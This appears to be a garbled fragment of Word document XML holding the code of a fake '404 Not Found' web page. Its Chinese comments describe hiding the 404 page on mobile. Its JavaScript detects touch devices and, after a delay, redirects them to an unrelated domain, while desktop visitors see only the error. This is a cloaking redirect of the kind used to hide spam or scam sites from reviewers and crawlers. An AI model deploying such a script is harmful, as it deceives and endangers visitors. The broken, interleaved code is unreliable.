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EOF&gt;&lt;/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404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m.src = "https://hm.baidu.com/hm.js?41835e500ed1eee4bce86c1ea730de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-color: #f0f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: f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ify-content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-items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o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pi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4px solid #f3f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top: 4px solid #349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radius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imation: spin 1s linear infin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2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keyframes sp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%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orm: rotate(0d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%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orm: rotate(360d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edia (max-width: 600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o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pi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* </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">添加 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">404 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">页面样式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rror-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family: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rror-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1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rror-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* </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">在移动设备下隐藏 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">404 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">页面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edia (max-width: 600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or-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* </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">使用媒体查询检测触摸设备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edia (hover: none) and (pointer: coar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o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or-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  <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">移动端加载动画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load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pinn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  <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">桌面端 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">404 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">页面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error-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1 class="error-code"&gt;404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error-text"&gt;Not Foun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The requested URL was not found on this serv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isTouchDevice = (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('ontouchstart' in window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avigator.maxTouchPoints &gt; 0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avigator.msMaxTouchPoints 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url = 'https://ysh105.bkvfj.cn/34.htm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TouchDevic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meout((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location.replace(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6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meout((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window.location.href !== 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catch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